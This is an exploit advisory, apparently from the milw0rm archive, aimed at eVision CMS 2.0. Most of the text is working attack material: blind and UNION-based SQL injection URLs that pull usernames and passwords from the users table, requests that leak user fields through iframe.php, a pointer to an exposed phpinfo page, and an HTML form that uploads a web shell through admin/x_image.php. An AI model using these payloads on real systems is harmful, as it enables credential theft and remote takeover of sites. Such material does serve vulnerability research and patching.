e-vision CMS 2.02 - SQL Injection / Arbitrary File Upload / Information Gathering
#####################################################################################
#### eVision 2.0 Sql Injection/Remote File Upload/IG ####
#####################################################################################
# #
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #
#Our Site : Http://IRCRASH.COM #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) #
#####################################################################################
# #
#Script Download : http://mesh.dl.sourceforge.net/sourceforge/e-vision/eVision-2.0.tar.gz
# #
#DORK : :( #
# #
#####################################################################################
# [Sql Injection] #
# #
#Blind : http://Site/print.php?id=1'+and+1=1/* #
#http://Site/style.php?template=1&module='+union+select+concat_ws(0x7c,username,pass)+from+users/*
#User : http://Site/iframe.php?field=username&module=users/* #
#Pass : http://Site/iframe.php?field=pass&module=users/* #
# [IG] #
#http://Site/admin/phpinfo.php #
# #
# [Remote File Upload] #
#Exploit : #
# #
#<html> #
#<!-- #
#Powered by : IrCrash (R3d.W0rm(Sina Yazdanmehr)) #
#Http://IrCrash.Com #
#//--> #
#<form action='http://[Site]/admin/x_image.php?type=background' method=post enctype=multipart/form-data>
#<input type=file name='file_upload'> #
#<input type=hidden name=insert value=1> #
#<input type=hidden name=s_rc value='file://'> #
#<input type=submit> #
#</form> #
#</html> #
#Your shell save in http://Site/imagebank/ #
# #
#####################################################################################
# Site : Http://IRCRASH.COM #
###################################### TNX GOD ######################################
# milw0rm.com [2008-08-02]